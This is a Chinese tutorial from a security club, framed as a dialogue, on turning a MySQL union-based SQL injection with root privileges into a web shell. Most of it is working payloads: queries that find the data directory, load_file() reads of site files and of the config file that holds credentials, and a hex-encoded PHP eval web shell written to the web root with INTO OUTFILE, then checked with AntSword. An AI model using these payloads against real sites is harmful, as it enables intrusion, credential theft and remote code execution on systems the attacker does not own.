如果你把人生看得太严肃,你就永远无法活着走出去。——佚名
小W看了我上次写的《手工注入基础-MySQL注入流程》,迫不及待的问我:“获取到管理员密码后应该怎么进行下一步呢?”
Me鄙视的看着他:“下一步按Next啊!”
小W给Me翻了个卫生眼,直愣愣的盯着我。
Me被他盯的有点虚,道:“一般获得管理员账号密码后,可以通过后台修改上传类型Getshell,或者利用网站本身的漏洞Getshell。”
小W歪着头看着我,道:“如果我没有获取到后台管理员账号密码呢?”
Me:“我说,你都有管理员账号密码了,为什么还纠结这个?”
小W:“我就想了解下一些奇特思路。”
Me:“如果网站是php+MySQL的网站,而且MySQL是root用户的话(root如果不降权的话),倒是可以Getshell,或者做一些其他,也可以提权。”
小W:“那如果我是root用户应该如何Getshell呢?”
Me:“我把流程给你写一下吧!”
1' union select user(),2#
1' union select @@datadir,2#
c:wampbinmysqlmysql5.5.20data
3、通过load_file()函数读取文件判断目录是否是正确的。
1' union select load_file('c:/wamp/www/index.php'),2#
看起来有点乱,可以通过hex()函数进行十六进制编码。
1' union select hex(load_file('c:/wamp/www/index.php')),2#
还可以通过load_file读取网站配置文件哦,配置文件一般是:
网站根目录/config/config.inc.php
1' union select hex(load_file('c:/wamp/www/config/config.inc.php')),2#
如果可以外联就可以直接在MySQL管理软件连接进行可视化操作了。
1' union select hex(load_file(0x633a2f77616d702f7777772f636f6e6669672f636f6e6669672e696e632e706870)),2#
*/<?php @eval($_POST['cmd']);?>/*
2a2f3c3f70687020406576616c28245f504f53545b27636d64275d293b3f3e2f2a
1' union select 0x2a2f3c3f70687020406576616c28245f504f53545b27636d64275d293b3f3e2f2a,0x2a2f into outfile 'c:/wamp/www/lalala.php'#
虽然注入的时候报错,但是访问lalala.php还是可以正常访问的,通过AntSword来看看是否可用。
ME摸了摸小W头三下,道:“小W你是否明了?”
本次科普到此结束,有问题可以在Q群咨询或论坛提问:
论坛:http://bbs.whitecell-club.org
欢迎投稿以及咨询问题。
版权声明:该科普文章属于WhiteCellClub原创,转载须申明!
![手工注入基础-巧用函数Getshell 手工注入基础-巧用函数Getshell]()
本文始发于微信公众号(WhiteCellClub):手工注入基础-巧用函数Getshell
评论